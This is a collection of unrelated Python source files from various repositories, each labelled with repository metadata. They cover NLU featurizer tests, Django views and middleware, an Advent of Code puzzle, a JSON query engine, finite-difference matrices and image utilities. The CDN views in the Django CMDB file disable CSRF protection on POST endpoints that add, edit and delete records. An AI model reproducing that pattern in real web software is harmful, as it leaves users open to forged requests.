def test_calculate_cls_vector(pooling, features, expected):
actual = DenseFeaturizer._calculate_sentence_features(features, pooling)
assert np.all(actual == expected)
def test_flexible_nlu_pipeline():
message = Message(data={TEXT: "This is a test message.", "intent": "test"})
training_data = TrainingData([message, message, message, message, message])
tokenizer = WhitespaceTokenizer()
tokenizer.train(training_data)
featurizer = CountVectorsFeaturizer(
component_config={FEATURIZER_CLASS_ALIAS: "cvf_word"}
)
featurizer.train(training_data)
featurizer = CountVectorsFeaturizer(
component_config={
FEATURIZER_CLASS_ALIAS: "cvf_char",
"min_ngram": 1,
"max_ngram": 3,
"analyzer": "char_wb",
}
)
featurizer.train(training_data)
featurizer = LexicalSyntacticFeaturizer({})
featurizer.train(training_data)
assert len(message.features) == 6
assert message.features[0].origin == "cvf_word"
assert message.features[0].type == FEATURE_TYPE_SEQUENCE
assert message.features[1].origin == "cvf_word"
assert message.features[1].type == FEATURE_TYPE_SENTENCE
# cvf word is also extracted for the intent
assert message.features[2].origin == "cvf_word"
assert message.features[2].type == FEATURE_TYPE_SEQUENCE
assert message.features[3].origin == "cvf_char"
assert message.features[3].type == FEATURE_TYPE_SEQUENCE
assert message.features[4].origin == "cvf_char"
assert message.features[4].type == FEATURE_TYPE_SENTENCE
assert message.features[5].origin == "LexicalSyntacticFeaturizer"
assert message.features[5].type == FEATURE_TYPE_SEQUENCE
sequence_feature_dim = (
message.features[0].features.shape[1] + message.features[5].features.shape[1]
)
sentence_feature_dim = message.features[0].features.shape[1]
classifier = DIETClassifier(
component_config={FEATURIZERS: ["cvf_word", "LexicalSyntacticFeaturizer"]}
)
model_data = classifier.preprocess_train_data(training_data)
assert len(model_data.get(TEXT).get(SENTENCE)) == 1
assert len(model_data.get(TEXT).get(SEQUENCE)) == 1
assert len(model_data.get(LABEL).get(SEQUENCE)) == 1
assert model_data.get(LABEL).get(SENTENCE) is None
assert model_data.get(TEXT).get(SEQUENCE)[0][0].shape == (5, sequence_feature_dim)
assert model_data.get(TEXT).get(SENTENCE)[0][0].shape == (1, sentence_feature_dim)
assert model_data.get(LABEL).get(SEQUENCE)[0][0].shape == (1, 1)
| 5,783 |
demo/code/2016-1-20/mytimezone/foo/views.py
|
uxlsl/uxlsl.github.io
| 0 |
2172136
|
import pytz
from django.shortcuts import redirect, render
from django.utils import timezone
class TimezoneMiddleware(object):
def process_request(self, request):
tzname = request.session.get('django_timezone')
if tzname:
timezone.activate(pytz.timezone(tzname))
else:
timezone.deactivate()
def set_timezone(request):
if request.method == 'POST':
request.session['django_timezone'] = request.POST['timezone']
return redirect('/set_timezone')
else:
return render(request, 'template.html',
{'timezones': pytz.common_timezones,
'value': timezone.now(),
})
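# Illustrative wiring (added): a minimal sketch of how this middleware and view
# could be hooked up in the demo project. It assumes the old-style (pre-1.10)
# MIDDLEWARE_CLASSES setting, since the class has no __init__(get_response),
# and the dotted path follows this file's location (foo/views.py).
#
# settings.py
#     USE_TZ = True
#     MIDDLEWARE_CLASSES += ('foo.views.TimezoneMiddleware',)
#
# urls.py
#     from django.conf.urls import url
#     from foo import views
#     urlpatterns = [url(r'^set_timezone$', views.set_timezone, name='set_timezone')]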
| 709 |
aops/cmdb/views/cdn.py
|
spunkmars/django-aops
| 26 |
2172548
|
#coding=utf-8
from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from django.core.paginator import Paginator, InvalidPage, EmptyPage, PageNotAnInteger
from django.db.models import Q
from django.core.urlresolvers import reverse
from django import forms
from django.forms import ModelForm
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.csrf import csrf_exempt
from libs.views.common import list_data, del_model_items, display_confirm_msg
from cmdb.forms.cdn import CdnForm
from cmdb.models.common import get_model_all_field_objects, get_model_relate_field, get_model_valid_fields
from cmdb.models.cdn import Cdn
import json
from libs.models.common import del_model_data
def app_info():
app = {
"name" : "cmdb",
"fun" : "cdn",
"edit_url" : "cmdb:edit_cdn",
"del_url" : "cmdb:del_cdn"
}
return app
@csrf_exempt  # disable CSRF
def add_cdn(request):
if request.method == 'POST':
form = CdnForm(model=Cdn, data=request.POST)
if form.is_valid():
new_cdn = form.save()
return HttpResponseRedirect(reverse('cmdb:list_cdn'))
else:
        form = CdnForm(model=Cdn)
app = app_info()
app['location'] = 'add'
m2m_fs = Cdn._meta.many_to_many
m2m_list=[]
for m2m_f in m2m_fs:
if m2m_f.name in form.fields.keys():
m2m_list.append(m2m_f.name)
return render_to_response('add_data.html',
{ 'form': form, 'app':app, 'm2m_list':m2m_list} ,context_instance=RequestContext(request))
@csrf_exempt  # disable CSRF
def edit_cdn(request, cdn_id):
cdn = get_object_or_404(Cdn, pk=cdn_id)
if request.method == 'POST':
form = CdnForm(model=Cdn, instance=cdn, data=request.POST)
if form.is_valid():
new_cdn = form.save()
return HttpResponseRedirect(reverse('cmdb:list_cdn'))
else:
form = CdnForm(model=Cdn, instance=cdn)
app = app_info()
app['location'] = 'edit'
m2m_fs = Cdn._meta.many_to_many
m2m_list=[]
for m2m_f in m2m_fs:
if m2m_f.name in form.fields.keys():
m2m_list.append(m2m_f.name)
return render_to_response('edit_data.html',
{ 'form': form, 'app':app, 'm2m_list':m2m_list} ,context_instance=RequestContext(request))
@csrf_exempt  # disable CSRF
def list_cdn(request):
model_object = Cdn
template_file = 'list_data.html'
#show_field_list = get_model_all_field_objects(model=model_object)
show_field_list = ['id', 'company', 'status', 'comment']
filter_field = 'supplier'
each_page_items = 10
custom_get_parameter = {}
app = app_info()
app['location'] = 'list'
render_context = list_data(app=app, request=request, model_object=model_object, each_page_items = each_page_items, filter_field = filter_field, template_file = template_file, show_field_list = show_field_list)
return render_context
@csrf_exempt  # disable CSRF
def del_cdn(request, cdn_id):
del_res = {}
if request.method == "POST":
del_res = del_model_data(model=Cdn, id=cdn_id)
html=json.dumps(del_res)
return HttpResponse(html, content_type="text/HTML")
| 3,380 |
day8.py
|
mmertama/advent-of-code-2021
| 0 |
2172820
|
example = '''be cfbegad cbdgef fgaecd cgeb fdcge agebfd fecdb fabcd edb | fdgacbe cefdb cefbgd gcbe
edbfga begcd cbg gc gcadebf fbgde acbgfd abcde gfcbed gfec | fcgedb cgb dgebacf gc
fgaebd cg bdaec gdafb agbcfd gdcbef bgcad gfac gcb cdgabef | cg cg fdcagb cbg
fbegcd cbd adcefb dageb afcb bc aefdc ecdab fgdeca fcdbega | efabcd cedba gadfec cb
aecbfdg fbg gf bafeg dbefa fcge gcbea fcaegb dgceab fcbdga | gecf egdcabf bgf bfgea
fgeab ca afcebg bdacfeg cfaedg gcfdb baec bfadeg bafgc acf | gebdcfa ecba ca fadegcb
dbcfg fgd bdegcaf fgec aegbdf ecdfab fbedc dacgb gdcebf gf | cefg dcbef fcge gbcadfe
bdfegc cbegaf gecbf dfcage bdacg ed bedf ced adcbefg gebcd | ed bcgafe cdgba cbgef
egadfb cdbfeg cegd fecab cgb gbdefca cg fgcdab egfdb bfceg | gbdfcae bgc cg cgb
gcafb gcf dcaebfg ecagb gf abcdeg gaef cafbge fdbac fegbdc | fgae cfgab fg bagce'''
def parse_digits(data):
signals = []
for ln in data:
sep = ln.find('|')
signals.append((ln[:sep].split(), ln[sep + 1:].split()))
return signals
def count_easy_digits(data):
signals = parse_digits(data)
counts = {x: 0 for x in range(0, 8)}
for s in signals:
output = s[1]
for o in output:
counts[len(o)] += 1
segments = [6, 2, 5, 5, 4, 5, 6, 3, 7, 6] # 0 1 2 3 4 5 6 7 8 9
print("easy digits", counts[segments[1]] + counts[segments[4]] + counts[segments[7]] + counts[segments[8]])
def digit_output(data):
values = parse_digits(data)
total = 0
for v in values:
digits = [None for _ in range(10)]
        digits[8] = set('abcdefg')  # all seven segments are lit for digit 8
signals = v[0]
for s in signals:
sig_set = set(list(s))
if len(s) == 2:
digits[1] = sig_set
if len(s) == 3:
digits[7] = sig_set
if len(s) == 4:
digits[4] = sig_set
if len(s) == 7:
digits[8] = sig_set
while not all(digits):
for s in signals:
sig_set = set(list(s))
if len(s) == 6:
if digits[1] and not sig_set.issuperset(digits[1]):
digits[6] = sig_set
if digits[7] and not sig_set.issuperset(digits[7]):
digits[6] = sig_set
if digits[4] and sig_set.issuperset(digits[4]):
digits[9] = sig_set
if len(s) == 5:
if digits[1] and sig_set.issuperset(digits[1]):
digits[3] = sig_set
if digits[7] and sig_set.issuperset(digits[7]):
digits[3] = sig_set
if digits[6] and sig_set.issubset(digits[6]):
digits[5] = sig_set
if digits[9] and not sig_set.issubset(digits[9]):
digits[2] = sig_set
if len(s) == 6:
if digits[0] and sig_set != digits[0] and digits[6] and sig_set != digits[6]:
digits[9] = sig_set
if digits[9] and sig_set != digits[9] and digits[6] and sig_set != digits[6]:
digits[0] = sig_set
if digits[0] and sig_set != digits[0] and digits[9] and sig_set != digits[9]:
digits[6] = sig_set
if len(s) == 5:
if digits[2] and sig_set != digits[2] and digits[3] and sig_set != digits[3]:
digits[5] = sig_set
if digits[5] and sig_set != digits[5] and digits[3] and sig_set != digits[3]:
digits[2] = sig_set
if digits[2] and sig_set != digits[2] and digits[5] and sig_set != digits[5]:
digits[3] = sig_set
'''
segments = [None for _ in range(8)]
segments[5] = digits[2].intersection(digits[1])
segments[4] = digits[8] - digits[9]
segments[3] = digits[8] - digits[0]
segments[2] = digits[8] - digits[6]
segments[1] = digits[3] - digits[5]
segments[6] = digits[1] - segments[2]
segments[7] = digits[3] - digits[7] - segments[3]
segments[0] = digits[7] - segments[2] - segments[6]
'''
value = 0
p = 1
outputs = v[1]
for o in reversed(outputs):
out_set = set(list(o))
for d in range(len(digits)):
if out_set == digits[d]:
value += d * p
p *= 10
total += value
# print(segments)
# print(value)
print("sum of digits is", total)
| 4,648 |
sql4json/data_query_engine.py
|
bheni/sql4json
| 7 |
2172669
|
from exceptions import *
from sql_statement import SQLStatement
from where_clause_evaluation_engine import *
from boolean_expressions.tree import BooleanExpressionTree
class DataQueryEngine(object):
where_evaluation_engine = WhereClauseEvaluationEngine()
def __init__(self, data, sql_str):
self.data = data
self.sql_statement = SQLStatement(sql_str)
self.results = None
self.from_roots = None
self.where_tree = None
self.init_from_roots()
self.init_where_boolean_tree()
self.query()
self.sort()
self.apply_limit()
def init_from_roots(self):
from_section = self.sql_statement.get_from_section()
if from_section is not None and len(from_section) > 0:
exists, self.from_roots = get_elements_by_path(self.data, from_section)
if not exists or len(self.from_roots) == 0:
raise FromClauseException("Could not find path %s." % from_section)
else:
self.from_roots = [self.data]
def init_where_boolean_tree(self):
self.where_tree = None
where_section = self.sql_statement.get_where_section()
if where_section is not None and len(where_section) > 0:
tokenizer = Tokenizer(where_section)
where_tokens = list(tokenizer)
if where_tokens is not None and len(where_tokens) > 0:
self.where_tree = BooleanExpressionTree(where_tokens, DataQueryEngine.where_evaluation_engine)
def query(self):
select_section = self.sql_statement.get_select_section()
select_items = split_on_any(select_section, frozenset((',', ' ', '\t', '\n', '\r')))
self.results = []
for root in self.from_roots:
if isinstance(root, tuple) or isinstance(root, list):
for node in root:
result_data = self.query_node(node, select_items)
if result_data is not None:
self.results.append(result_data)
elif isinstance(root, dict):
results = self.query_node(root, select_items)
if results is not None:
self.results.append(results)
def query_node(self, node, select_items):
if self.matches_where(node):
node_data = {}
for item in select_items:
if item.endswith('/'):
item += '*'
                select_path_elements = split_on_any(item, frozenset(('/', '\\', '.')))
                select_data = self.find_selected_items(node, select_path_elements)
if select_data is not None:
node_data.update(select_data)
return node_data
else:
return None
def find_selected_items(self, node, select_path_elements):
matching_data = {}
current = node
destination = matching_data
parent_dest = matching_data
current_key = None
element = None
num_elements = len(select_path_elements)
for i, element in enumerate(select_path_elements):
if i < num_elements - 1:
if element not in current:
return None
elif element not in destination:
destination[element] = {}
current_key = element
current = current[element]
parent_dest = destination
destination = destination[element]
else:
if element == '*':
if current_key is not None:
parent_dest[current_key] = current
else:
matching_data = current
if element == '__key__':
parent_dest['__key__'] = current.keys()
else:
if element in current:
destination[element] = current[element]
else:
destination[element] = None
return matching_data
def matches_where(self, node):
if self.where_tree is None:
return True
else:
return self.where_tree.evaluate(node)
def sort(self):
pass
def apply_limit(self):
limit = self.sql_statement.get_limit_section()
if limit is not None:
if len(limit) != 1 or not limit[0].isdigit():
raise LimitClauseException('"%s" is not a valid limit' % ' '.join(limit))
else:
                limit = int(limit[0])
while len(self.results) > limit:
self.results.pop()
def get_results(self):
return self.results
def get_sql_statement(self):
return self.sql_statement
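# Hypothetical usage sketch (added; the query syntax below is an assumption
# inferred from the select/from/where/limit handling above, not taken from the
# project's documentation):
#
#     data = {"users": [{"name": "ann", "age": 30}, {"name": "bob", "age": 20}]}
#     engine = DataQueryEngine(data, "select name from users where age == 30")
#     print(engine.get_results())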
| 4,813 |
array_calc.py
|
chapman-phys220-2017f/cw-07-quinn-and-dain-and-andrew-cw-06
| 0 |
2170953
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
def derivative(a,b,n):
"""derivative(a,b,n)
Function to create the derivative matrix. Takes 3 inputs:
- a = float, starting point of the domain
- b = float, end point of domain
- n = number of points created in the domain
Output: an 'n x n' 2-dimensional numpy array that, when matrix multiplied by a 1-D array,
returns the approximate derivative at each point."""
t = np.linspace(a,b,n)
dx = t[1]-t[0]
    A = np.zeros((n, n), dtype='float64')
#Forward Difference
A[0,0] = -1/dx
A[0,1] = 1/dx
#Symmetric Difference
index = np.arange(1,n-1)
A[index, index-1] = -1/(2*dx)
A[index, index+1] = 1/(2*dx)
#Backward Difference
A[n-1,n-2] = -1/dx
A[n-1,n-1] = 1/dx
return A
def second_derivative(a,b,n):
"""second_derivative(a,b,n)
Function to create the second derivative matrix. Takes 3 inputs:
- a = float, starting point of the domain
- b = float, end point of domain
- n = number of points created in the domain
Output: an 'n x n' 2-dimensional numpy array that, when matrix multiplied by a 1-D array,
returns the approximate second derivative at each point."""
t = np.linspace(a,b,n)
dx = t[1]-t[0]
    A = np.zeros((n, n), dtype='float64')
#Forward Difference
A[0,0] = 1
A[0,1] = -2
A[0,2] = 1
#Symmetric/Forward Difference
A[1,0] = 2
A[1,1] = -3
A[1,3] = 1
#Symmetric Difference
index = np.arange(2,n-2)
A[index, index-2] = 1/2
A[index, index] = -1
A[index, index+2] = 1/2
#Symmetric/Backward Difference
A[n-2,n-4] = 1
A[n-2,n-2] = -3
A[n-2,n-1] = 2
#Backward Difference
A[n-1,n-3] = 1
A[n-1,n-2] = -2
A[n-1,n-1] = 1
return A*(1/(2*dx**2))
def f(a,b,n):
"""Returns an array of the square of the input (a float)"""
t = np.linspace(a,b,n)
return t**2
def s(a,b,n):
"""Returns an array of the sine of the input (float)"""
t = np.linspace(a,b,n)
sin = np.vectorize(np.sin)
sin = sin(t)
return sin
def g(a,b,n):
"""Returns an array of the gaussian function"""
def gauss(x):
"""Returns the Gaussian function dependent on the input float"""
c = 1/(np.sqrt(2*np.pi))
gauss = c*np.exp(-x**2/2)
return gauss
t = np.linspace(a,b,n)
gs = np.vectorize(gauss)
gs = gs(t)
return gs
def plot_function(a,b,n,f,string):
"""plot_function(a,b,n,f,string)"""
t = np.linspace(a,b,n)
deriv = np.dot(derivative(a,b,n),f)
sec_deriv = np.dot(second_derivative(a,b,n),f)
plt.plot(t,f,'b', label=string)
plt.plot(t,deriv,'r', label='Derivative')
plt.plot(t,sec_deriv,'g', label='Second Derivative')
plt.title(string)
plt.legend()
plt.show()
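# Example driver (added): a small sketch exercising the helpers above on
# f(x) = x**2 over [-3, 3]; the interval and point count are arbitrary choices.
if __name__ == "__main__":
    a, b, n = -3.0, 3.0, 200
    plot_function(a, b, n, f(a, b, n), '$x^2$')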
| 2,979 |
scripts/script_template.py
|
EricRa/py-win-admin
| 0 |
2171747
|
# DESCRIPTION:
# [description]
#
#
# USAGE:
# [Usage instructions]
#
# DEPENDENCIES:
# Python 3.5+
# Powershell 5.0+
# [Additional dependencies here]
# [code goes here]
#
#
#
#
#
#
#
#
# NOTES, TROUBLESHOOTING, AND OTHER INFO
#
| 240 |
milk/forms.py
|
NCC-AI/milk
| 0 |
2172848
|
from django import forms
from .models import Progress
class DirectoryPathForm(forms.ModelForm):
class Meta:
model = Progress
fields = ("target", )
class ImageUploadForm(forms.Form):
file = forms.ImageField(label='画像ファイル')
| 250 |
api/views.py
|
eee-alie/django-test
| 0 |
2172655
|
from rest_framework import viewsets
from .serilizers import Articleserializers
from .models import ArticleModels
class ArticleView(viewsets.ModelViewSet):
queryset = ArticleModels.objects.all()
serializer_class = Articleserializers
lookup_field = "slug"
| 267 |
src/accounts/urls.py
|
samrika25/TRAVIS_HEROKU_GIT
| 0 |
2171389
|
from django.contrib import admin
from django.urls import path
from .Views import (RegisterView, LoginView, LogoutView, ChangePasswordView, ResetPasswordView)
app_name = "accounts"
urlpatterns = [
path('register/',RegisterView.as_view(), name="register"),
path('login/',LoginView.as_view(), name="login"),
path('logout/', LogoutView.as_view(), name="logout"),
path('reset/', ResetPasswordView.as_view(), name="reset"),
path('forgot/', ChangePasswordView.as_view(), name="forgot")
]
| 502 |
tests/operators/test_db.py
|
storiesbi/airflow_plugins
| 15 |
2172697
|
import os
import pytest
from airflow_plugins.operators import CreateTableWithColumns
@pytest.mark.parametrize(
['file_name', 'known_columns'],
[('test_db_columns.csv', [
"date", "bookings_count", "sectors_count", "passengers_count",
"seats_count", "bags_count", "booked_at", "partner", "market",
"airlines", "currency", "nationality", "device_type", "trip_type",
"src_dst", "src", "dst", "transfers", "booking_channel", '"AT_sales"',
"insurance_costs", "has_kiwi_interlining", "extras_sales", "refunds",
'"AT_costs"', "turnover", "margin", '"intra space"'
])]
)
def test_create_table_with_columns(file_name, known_columns):
file = os.path.join(os.path.dirname(os.path.realpath(__file__)), file_name)
get_columns = CreateTableWithColumns._get_table_columns
columns = get_columns(file)
assert len(known_columns) == len(columns)
for i in range(len(known_columns)):
assert known_columns[i] == columns[i]
| 992 |
stock/marketdata/interface.py
|
shenzhongqiang/cnstock_py
| 2 |
2171666
|
import redis
import os.path
import datetime
from stock.marketdata.bar import Bar
from stock.utils.symbol_util import exsymbol_to_symbol
from abc import ABCMeta, abstractmethod
from stock.marketdata.utils import load_csv
from stock.marketdata.storefactory import get_store
from config import store_type
import pandas as pd
import tushare as ts
class NoHistoryBeforeDate(Exception):
pass
class TooFewBarsBeforeDate(Exception):
pass
class MarketData:
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self):
pass
@abstractmethod
def get_data(self, exsymbol):
pass
def get_history_by_date(self, exsymbol):
store = get_store(store_type)
df = store.get(exsymbol)
return df[df.date <= self.date]
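# Illustrative subclass (added): a minimal sketch of how the abstract interface
# above might be satisfied; it simply reuses the shared date-filtered history
# helper defined on MarketData, and any richer behaviour is left out on purpose.
class StoreMarketData(MarketData):
    def __init__(self, date):
        self.date = date
    def get_data(self, exsymbol):
        # return all bars up to and including self.date
        return self.get_history_by_date(exsymbol)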
| 770 |
frasco_images.py
|
frascoweb/frasco-images
| 0 |
2171799
|
from frasco import Feature, action, OptionMissingError, AttrDict, current_app
from PIL import Image
import os
class ImagesFeature(Feature):
name = "images"
defaults = {"search_dir": None,
"dest_dir": None,
"output_format": None}
def init_app(self, app):
default_dir = None
if "forms" in app.features:
default_dir = app.features.forms.options["upload_dir"]
else:
default_dir = app.static_folder
if not self.options["search_dir"]:
self.options["search_dir"] = default_dir
if not self.options["dest_dir"]:
self.options["dest_dir"] = default_dir
def get_path(self, filename):
if os.path.isabs(filename):
return filename
sdir = self.options["search_dir"]
if sdir:
f = os.path.join(sdir, filename)
if os.path.exists(f):
return f
return filename
def get_dest_filename(self, path, opts, default="{path}{prefix}{name}{suffix}{ext}", **kwargs):
dest = opts.get("dest", default)
dest_dir = opts.get("dest_dir", self.options["dest_dir"])
if "{" in dest:
filename, ext = os.path.splitext(path)
data = dict(path=os.path.dirname(filename), name=os.path.basename(filename),
filename=filename, ext=ext, prefix="", suffix="")
data.update(kwargs)
data.update(dict((k, opts[k]) for k in ("ext", "prefix", "suffix") if k in opts))
dest = dest.format(**data)
if not os.path.isabs(dest) and dest_dir:
return os.path.join(dest_dir, dest), dest
return dest, dest
def save_img(self, path, opts, img, **kwargs):
pathname, filename = self.get_dest_filename(path, opts, **kwargs)
img.save(pathname, opts.get("format", self.options["output_format"]))
return filename
def get_size(self, opts, lprefix="", sprefix="", ratio=None):
w = opts.get("%swidth" % lprefix, opts.get("%sw" % sprefix))
h = opts.get("%sheight" % lprefix, opts.get("%sh" % sprefix))
if ("%ssize" % lprefix) in opts:
w, h = map(int, opts["%ssize" % lprefix].split("x", 1))
if ((w is None or h is None) and not ratio) or (w is None and h is None):
raise OptionMissingError("Missing size options for image manipulation")
if w is None:
r = float(h) / float(ratio[1])
w = int(ratio[0] * r)
elif h is None:
r = float(w) / float(ratio[0])
h = int(ratio[1] * r)
return w, h
@action(default_option="path", as_="image")
def read_image(self, path):
        img = Image.open(self.get_path(path))
return AttrDict(format=img.format, size=img.size, mode=img.mode)
@action("resize_image")
def resize(self, path, resample=Image.ANTIALIAS, **opts):
path = self.get_path(path)
img = Image.open(path)
keep_ratio = False
try:
size = self.get_size(opts)
except OptionMissingError:
size = self.get_size(opts, "max_", "m", ratio=img.size)
keep_ratio = True
if keep_ratio:
img.thumbnail(size, resample)
else:
img = img.resize(size, resample)
return self.save_img(path, opts, img, suffix="-%sx%s" % size)
@action("create_image_thumbnail", default_option="path")
def create_thumbnail(self, path, resample=Image.ANTIALIAS, **opts):
img = Image.open(self.get_path(path))
fixed_size = False
try:
size = self.get_size(opts)
fixed_size = True
except OptionMissingError:
size = self.get_size(opts, "max_", "m", ratio=img.size)
if fixed_size and size[0] < img.size[0] and size[1] < img.size[1]:
r = max(float(size[0]) / float(img.size[0]), float(size[1]) / float(img.size[1]))
isize = (int(img.size[0] * r), int(img.size[1] * r))
img = img.resize(isize, resample)
x = max((isize[0] - size[0]) / 2, 0)
y = max((isize[1] - size[1]) / 2, 0)
img = img.crop((x, y, size[0], size[1]))
else:
img.thumbnail(size, resample)
return self.save_img(path, opts, img, suffix="-thumb-%sx%s" % size)
@action("crop_image")
def crop(self, path, **opts):
box = opts.get("box")
if not box:
w = opts.get("width", opts.get("w"))
h = opts.get("height", opts.get("h"))
box = (opts.get("x", 0), opts.get("y", 0), w, h)
path = self.get_path(path)
img = Image.open(path)
img = img.crop(box)
return self.save_img(path, opts, img, suffix="-cropped")
@action("rotate_image")
def rotate(self, path, angle, resample=0, expand=0, **opts):
path = self.get_path(path)
        img = Image.open(path)
img = img.rotate(float(angle), resample, expand)
return self.save_img(path, opts, img, suffix="-rotated")
@action("transpose_image")
def transpose(self, path, method, **opts):
mapping = {"flip_left_right": Image.FLIP_LEFT_RIGHT,
"flip_top_bottom": Image.FLIP_TOP_BOTTOM,
"rotate90": Image.ROTATE_90,
"rotate180": Image.ROTATE_180,
"rotate270": Image.ROTATE_270}
path = self.get_path(path)
img = Image.open(path)
img = img.transpose(mapping[method])
return self.save_img(path, opts, img, suffix="-" + method)
@action("add_image_watermark")
def add_watermark(self, path, watermark, **opts):
path = self.get_path(path)
img = Image.open(path)
wtmk = Image.open(watermark)
iw, ih = img.size
ww, wh = wtmk.size
pos = (opts.get("x", iw - ww), opts.get("y", ih - wh))
img.paste(wtmk, pos)
return self.save_img(path, opts, img, suffix="-watermark")
| 5,990 |
src/metric.py
|
HephaestusProject/pytorch-FCN
| 0 |
2173022
|
import torch.nn as nn
from sklearn.metrics import average_precision_score, roc_auc_score
def get_auc(y_score, y_true):
# for Validation sanity check:
if y_true.shape[0] == 1 or y_true.shape[0] == 2:
return 0, 0
else:
roc_aucs = roc_auc_score(
y_true.flatten(0, 1).detach().cpu().numpy(),
y_score.flatten(0, 1).detach().cpu().numpy(),
)
pr_aucs = average_precision_score(
y_true.flatten(0, 1).detach().cpu().numpy(),
y_score.flatten(0, 1).detach().cpu().numpy(),
)
return roc_aucs, pr_aucs
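# Small self-check (added): tensor shapes and values below are illustrative
# assumptions; get_auc expects (batch, chunk, n_tags) tensors and flattens the
# first two dimensions before scoring.
if __name__ == "__main__":
    import torch
    flat = torch.tensor([[i % 2, (i + 1) % 2] for i in range(12)], dtype=torch.float32)
    y_true = flat.reshape(4, 3, 2)  # every tag column contains both classes
    y_score = torch.rand(4, 3, 2)
    roc, pr = get_auc(y_score, y_true)
    print("ROC-AUC={:.3f} PR-AUC={:.3f}".format(roc, pr))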
| 599 |
Util/postprocessing/urca-tools/slice-convgrad.py
|
sailoridy/MAESTRO
| 17 |
2172541
|
#!/usr/bin/env python
import yt
from yt import derived_field
import numpy as np
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('infile', type=str, help='Name of input plotfile.')
parser.add_argument('-adiabatic', '--adiabatic', action='store_true', help='If supplied, plot adiabatic excess.')
parser.add_argument('-ledoux', '--ledoux', action='store_true', help='If supplied, plot ledoux excess.')
parser.add_argument('-convtype', '--convtype', action='store_true', help='If supplied, plot convective type.')
parser.add_argument('-w', '--width', type=float,
help='Width of slice (cm). Default is domain width.')
parser.add_argument('-sign', '--sign', action='store_true', help='If supplied, plot only the sign of the excess.')
parser.add_argument('-fmin', '--field_min', type=float, help='Minimum scale for colorbar.')
parser.add_argument('-fmax', '--field_max', type=float, help='Maximum scale for colorbar.')
parser.add_argument('-log', '--logscale', action='store_true', help='If supplied, use a log scale for the field.')
parser.add_argument('-symlog', '--symlog', action='store_true', help='If supplied, use symlog scaling, which is linear near zero, to accomodate positive and negative values.')
parser.add_argument('-linthresh', '--linthresh', type=float, help='Linear threshold for symlog scaling. (Default is 0.1)')
parser.add_argument('-dc', '--drawcells', action='store_true', help='If supplied, draw the cell edges.')
parser.add_argument('-dg', '--drawgrids', action='store_true', help='If supplied, draw the grids.')
parser.add_argument('-octant', '--octant', action='store_true', help='Sets slice view appropriately for octant dataset.')
args = parser.parse_args()
@derived_field(name='adiabatic_excess')
def _adiabatic_excess(field, data):
return data[('boxlib','actual gradient')] - data[('boxlib','adiabatic gradient')]
@derived_field(name='ledoux_excess')
def _ledoux_excess(field, data):
return data[('boxlib','actual gradient')] - data[('boxlib','ledoux gradient')]
@derived_field(name='sign_adiabatic_excess')
def _sign_adiabatic_excess(field, data):
return np.sign(data[('boxlib','actual gradient')] - data[('boxlib','adiabatic gradient')])
@derived_field(name='sign_ledoux_excess')
def _sign_ledoux_excess(field, data):
return np.sign(data[('boxlib','actual gradient')] - data[('boxlib','ledoux gradient')])
# Convective type is defined as follows:
# 1.0 = Convectively unstable wrt Ledoux and Adiabatic
# 0.0 = Semiconvection, stable wrt Ledoux but unstable wrt Adiabatic or v.v.
# -1.0 = Convectively stable wrt Ledoux and Adiabatic
@derived_field(name='conv_type')
def _conv_type(field, data):
return 0.5*data['sign_ledoux_excess']+0.5*data['sign_adiabatic_excess']
def doit(field):
ds = yt.load(args.infile)
if not args.width:
width = max(ds.domain_width)
else:
width = yt.YTQuantity(args.width, 'cm')
maxv = ds.all_data().max(field)
minv = ds.all_data().min(field)
pos_maxv = np.ceil(np.log10(maxv))
neg_maxv = np.ceil(np.log10(minv))
logmaxv = max(pos_maxv, neg_maxv)
linminv = min(abs(maxv), abs(minv))
if args.octant:
dcenter = width.in_units('cm').v/2.0
cpos = ds.arr([dcenter, dcenter, dcenter], 'cm')
s = yt.SlicePlot(ds, 'x', field, center=cpos, width=width, origin="native")
else:
s = yt.SlicePlot(ds, 'x', field, center='c', width=width)
s.annotate_scale()
if args.drawcells:
s.annotate_cell_edges()
if args.drawgrids:
s.annotate_grids()
s.set_buff_size(2048)
if minv < 0.0 and maxv > 0.0:
s.set_cmap(field, 'PiYG')
linthresh = 0.1
if ((args.logscale or args.symlog) and
not args.sign and not field=='conv_type'):
if args.linthresh:
linthresh = args.linthresh
s.set_log(field, args.logscale, linthresh=linthresh)
else:
s.set_log(field, args.logscale)
if args.sign or field=='conv_type':
s.set_zlim(field, -1.0, 1.0)
plot = s.plots[field]
colorbar = plot.cb
s._setup_plots()
if field != 'conv_type':
colorbar.set_ticks([-1, 0, 1])
colorbar.set_ticklabels(['$-1$', '$0$', '$+1$'])
else:
colorbar.set_ticks([-0.8, 0, 0.65])
colorbar.ax.tick_params(axis=u'both', which=u'both',length=0)
colorbar.ax.set_yticklabels(['stable', 'semiconvective', 'convective'], rotation=90)
elif args.field_min and args.field_max:
s.set_zlim(field, args.field_min, args.field_max)
elif args.field_min and args.field_min < 0.0:
s.set_zlim(field, args.field_min, -args.field_min)
elif args.field_max and args.field_max > 0.0:
s.set_zlim(field, -args.field_max, args.field_max)
else:
s.set_zlim(field, -linthresh, linthresh)
else:
s.set_cmap(field, 'Greens')
s.save('{}.slice.{}.png'.format(args.infile, field))
if __name__=='__main__':
if args.convtype:
field = 'conv_type'
doit(field)
if args.adiabatic:
field = 'adiabatic_excess'
if args.sign:
field = 'sign_' + field
doit(field)
if args.ledoux:
field = 'ledoux_excess'
if args.sign:
field = 'sign_' + field
doit(field)
if not args.adiabatic and not args.ledoux and not args.convtype:
if args.sign:
doit('sign_adiabatic_excess')
doit('sign_ledoux_excess')
else:
doit('adiabatic_excess')
doit('ledoux_excess')
doit('conv_type')
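# Example invocation (added; the plotfile name is an assumption):
#
#     python slice-convgrad.py plt00000 -convtype -adiabatic -sign -w 5.0e8 -dg
#
# which writes one plt00000.slice.<field>.png image per requested field.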
| 5,756 |
tests/schema/test_report_drafts.py
|
openlobby/openlobby-server
| 7 |
2171122
|
import pytest
from openlobby.core.models import User
from ..dummy import prepare_reports
pytestmark = [pytest.mark.django_db, pytest.mark.usefixtures("django_es")]
def test_unauthenticated(call_api, snapshot):
prepare_reports()
query = """
query {
reportDrafts {
id
}
}
"""
response = call_api(query)
snapshot.assert_match(response)
